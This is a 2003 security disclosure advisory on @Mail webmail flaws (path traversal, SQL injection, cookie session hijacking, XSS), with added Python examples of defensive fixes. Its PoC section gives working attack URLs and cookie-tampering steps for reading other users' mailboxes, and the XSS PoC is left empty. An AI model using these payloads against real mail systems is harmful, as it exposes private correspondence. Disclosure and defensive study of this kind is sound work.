[Full-Disclosure] @Mail web interface multiple security vulnerabilities
From: S-Quadra Security Research (research_at_s-quadra.com)
Date: 12/09/03
To: full-disclosure <full-disclosure@lists.netsys.com>, bugtraq <bugtraq@securityfocus.com> Date: Tue, 09 Dec 2003 14:23:49 +0300
S-Quadra Advisory #2003-12-09
Topic: @Mail web interface multiple security vulnerabilities
Severity: Average
Vendor URL: http://www.atmail.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031209.txt
Release date: 09 Dec 2003
1. DESCRIPTION
"@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)." -
as the www.atmail.com site says.
2. DETAILS
Multiple security vulnerabilities have been found in the @Mail web
interface which, in the worst case, could allow a remote attacker to gain
access to a user's mailbox.
@Mail allows two different types of installation:
a) Flat file install
All profiles and messages of @Mail users are stored in files.
This storage method is recommended for user bases of fewer than 10,000 users.
b) SQL database install (MySQL)
User profiles and messages are stored in a SQL database.
-- Vulnerability 1: Flat file install - Input validation error
'showmail.pl' fails to validate the 'Folder' request parameter, which
allows an attacker to point it at the mailbox of any user registered in
the @Mail system.
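The defect above is a path traversal: the script joins an untrusted 'Folder' value onto the mailbox directory without checking that the result stays inside the caller's own mailbox. The following Python function is an added example of the check a web front end should perform; it is not @Mail code, and the directory layout (one directory per account under MAIL_ROOT, with an 'mbox' subdirectory) is an assumption made for the example. The account name is taken from the server-side session, never from the request.

```python
import posixpath

# Assumed layout for this example (not @Mail's real layout):
# /var/atmail/users/<account>/mbox/<Folder>
MAIL_ROOT = "/var/atmail/users"


def resolve_folder(account: str, folder: str) -> str:
    """Return the absolute path of `folder` inside `account`'s mailbox.

    Raises ValueError when the request would escape the mailbox directory.
    `account` must come from the authenticated session, not from the URL.
    """
    if not folder or "\0" in folder:
        raise ValueError("empty or malformed folder name")
    # Windows builds also treat backslash as a separator; normalise both.
    normalized = folder.replace("\\", "/")
    # Reject absolute paths and any '..' component before touching the filesystem.
    if normalized.startswith("/") or ".." in normalized.split("/"):
        raise ValueError("folder name must not contain traversal components")
    mailbox_root = posixpath.join(MAIL_ROOT, account, "mbox")
    candidate = posixpath.normpath(posixpath.join(mailbox_root, normalized))
    # Defence in depth: the normalised path must still lie under the mailbox root.
    if candidate != mailbox_root and not candidate.startswith(mailbox_root + "/"):
        raise ValueError("folder resolves outside the mailbox")
    return candidate


def is_safe_folder(account: str, folder: str) -> bool:
    """Convenience wrapper: True if `folder` is acceptable for `account`."""
    try:
        resolve_folder(account, folder)
        return True
    except ValueError:
        return False
```

A rejected request should be logged together with the session's account name; repeated '..' components in a folder parameter are a useful indicator of probing in the web server logs.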
-- Vulnerability 2: SQL database install - Multiple SQL injection
vulnerabilities
Multiple SQL injection vulnerabilities have been found in the @Mail web
interface. User-supplied input is not filtered before being used in a
SQL query; consequently, query modification is possible. Successful
exploitation could allow a remote attacker to read any email message for
any email address registered in the @Mail system.
Affected scripts: 'atmail.pl', 'search.pl', 'reademail.pl'.
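The root cause described above is string-built SQL. The following Python example, added here and not part of @Mail, shows the defect next to its correction using an in-memory SQLite database: the string-built query lets a quote in the 'folder' value rewrite the WHERE clause, while the parameterised query treats the same value as data and additionally insists that the message id is numeric. The table name 'EmailDatabase_v' and column 'Account' are taken from the advisory's PoC; the remaining columns and rows are constructed for the example.

```python
import sqlite3

# Constructed schema for this example; only EmailDatabase_v / Account come
# from the advisory, the other columns are assumed.
SCHEMA = """
CREATE TABLE EmailDatabase_v (
    id INTEGER, Account TEXT, Folder TEXT, Subject TEXT
);
"""
SAMPLE_ROWS = [  # constructed sample data
    (1, "hacker@atmail.com", "Inbox", "hello"),
    (666, "victim@atmail.com", "Inbox", "confidential"),
]


def make_db() -> sqlite3.Connection:
    """Build the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO EmailDatabase_v VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def read_email_vulnerable(conn, account: str, msg_id: str, folder: str):
    """Defective pattern: request values interpolated straight into SQL."""
    sql = ("SELECT id, Subject FROM EmailDatabase_v "
           "WHERE EmailDatabase_v.Account='%s' AND id='%s' AND Folder='%s'"
           % (account, msg_id, folder))
    return conn.execute(sql).fetchall()


def read_email(conn, account: str, msg_id: str, folder: str):
    """Corrected pattern: bound parameters plus a type check on the id.

    `account` must be the authenticated user's account from the session.
    """
    if not msg_id.isdigit():
        return []  # a message id is always an integer; reject anything else
    sql = ("SELECT id, Subject FROM EmailDatabase_v "
           "WHERE Account = ? AND id = ? AND Folder = ?")
    return conn.execute(sql, (account, int(msg_id), folder)).fetchall()
```

With bound parameters the folder value is compared literally, so a folder named `qwer' or ...` simply matches no row; the account restriction can no longer be bypassed from the request.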
-- Vulnerability 3: SQL database install - Session hijacking vulnerability
When a user logs into @Mail through the web interface, his session ID and
mailbox name are saved in a cookie. Modifying the mailbox name allows an
attacker to gain access to the victim's mailbox.
The victim's session ID must be active for this attack to be successful.
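The weakness here is that the application trusts the mailbox name carried in the cookie instead of the one it bound to the session at login. The following Python example is added here (it is not @Mail code) and shows the server-side binding a web interface needs: the session store maps a random session ID to the account that authenticated, the cookie's Account field is only ever compared against that binding, and a mismatch invalidates the session. The '&'-separated cookie layout parsed below follows the advisory's PoC; the in-memory store is an assumption for the example.

```python
import secrets
from typing import Dict, Optional
from urllib.parse import unquote

# Server-side session store: session id -> authenticated account.
# In-memory for the example; a real deployment would persist it with an expiry.
SESSIONS: Dict[str, str] = {}


def login(account: str) -> str:
    """Create a session for an already-authenticated account and return its id."""
    sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not guessable
    SESSIONS[sid] = account
    return sid


def parse_atmail_cookie(cookie: str) -> Dict[str, str]:
    """Parse the 'key&value&key&value' layout shown in the advisory."""
    parts = [unquote(p) for p in cookie.split("&")]
    if len(parts) % 2:
        raise ValueError("malformed cookie")
    return dict(zip(parts[0::2], parts[1::2]))


def account_for_request(cookie: str) -> Optional[str]:
    """Return the account a request may act for, or None if it must be refused.

    The server-side mapping is authoritative. The client-supplied Account
    field is accepted only when it agrees with that mapping; a disagreement
    is treated as tampering and the session is dropped.
    """
    try:
        fields = parse_atmail_cookie(cookie)
    except ValueError:
        return None
    sid = fields.get("SessionID", "")
    account = SESSIONS.get(sid)
    if account is None:
        return None
    if fields.get("Account", account) != account:
        SESSIONS.pop(sid, None)
        return None
    return account


def logout(sid: str) -> None:
    """Explicit logout so a leaked session id stops working immediately."""
    SESSIONS.pop(sid, None)
```

Because every mailbox lookup then uses the account returned by `account_for_request`, editing the Account field in the cookie can no longer redirect a valid session to someone else's mailbox; a mismatch is also a clean signal to log and alert on.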
-- Vulnerability 4: All types of install - Cross Site Scripting
vulnerability in 'showmail.pl'
By injecting specially crafted JavaScript code into a URL and tricking a
user into visiting it, a remote attacker can steal the session ID and gain
access to the victim's mailbox.
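Two controls address the reflected XSS and its consequence described above: every untrusted value must be HTML-escaped before it is written into the page, and the session cookie should carry the HttpOnly attribute so that script running in the page cannot read it. The following Python example is added here and is not @Mail code; the page fragment it renders and the cookie name 'SessionID' (taken from the advisory's cookie layout) are assumptions for the example.

```python
import html
from http.cookies import SimpleCookie


def render_message(subject: str, sender: str, body: str) -> str:
    """Render a message view with every untrusted field escaped.

    html.escape() also quotes " and ', so the values are safe inside
    attribute values as well as element content.
    """
    return (
        '<div class="mail"><h2>%s</h2><p>From: %s</p><pre>%s</pre></div>'
        % (html.escape(subject), html.escape(sender), html.escape(body))
    )


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie header for the session id with HttpOnly set.

    HttpOnly keeps the cookie out of document.cookie, so an injected script
    cannot simply read and exfiltrate the session id.
    """
    cookie = SimpleCookie()
    cookie["SessionID"] = session_id
    cookie["SessionID"]["httponly"] = True
    cookie["SessionID"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def contains_raw_markup(rendered: str, untrusted: str) -> bool:
    """Check helper: True if an untrusted value reached the page unescaped."""
    return untrusted in rendered and any(ch in untrusted for ch in "<>\"'&")
```

HttpOnly limits what an injected script can read; it does not remove the injection, which is why the output escaping is the primary fix and the cookie attribute is defence in depth.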
3. PoC Code
-- Vulnerability 1
Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server
The following URL gives access to victim@somehost.com's mailbox:
- http://www.site.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox
-- Vulnerability 2
Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server
- Through the SQL injection vulnerability in 'search.pl' an attacker can
find the message ID of any message of any registered user.
- The following URL opens the message with message ID '666' for user
'victim@atmail.com':
- http://www.site.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1
-- Vulnerability 3
Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server
1. Attacker logs into @Mail web interface.
2. Attacker changes the mailbox name in the cookie to the victim's mailbox name:
Account&hacker%40somehost.com&SessionID&1064305709fzvpjackee =>
Account&victim%40somehost.com&SessionID&1064305709fzvpjackee
3. Attacker opens the web interface of the victim's mailbox by visiting the
following URL:
- http://www.site.com/parse.pl?file=html/english/xp/xplogin.html
-- Vulnerability 4
Platforms: @Mail 3.52 Demo for Windows NT/2000/XP on Windows 2000
Advanced Server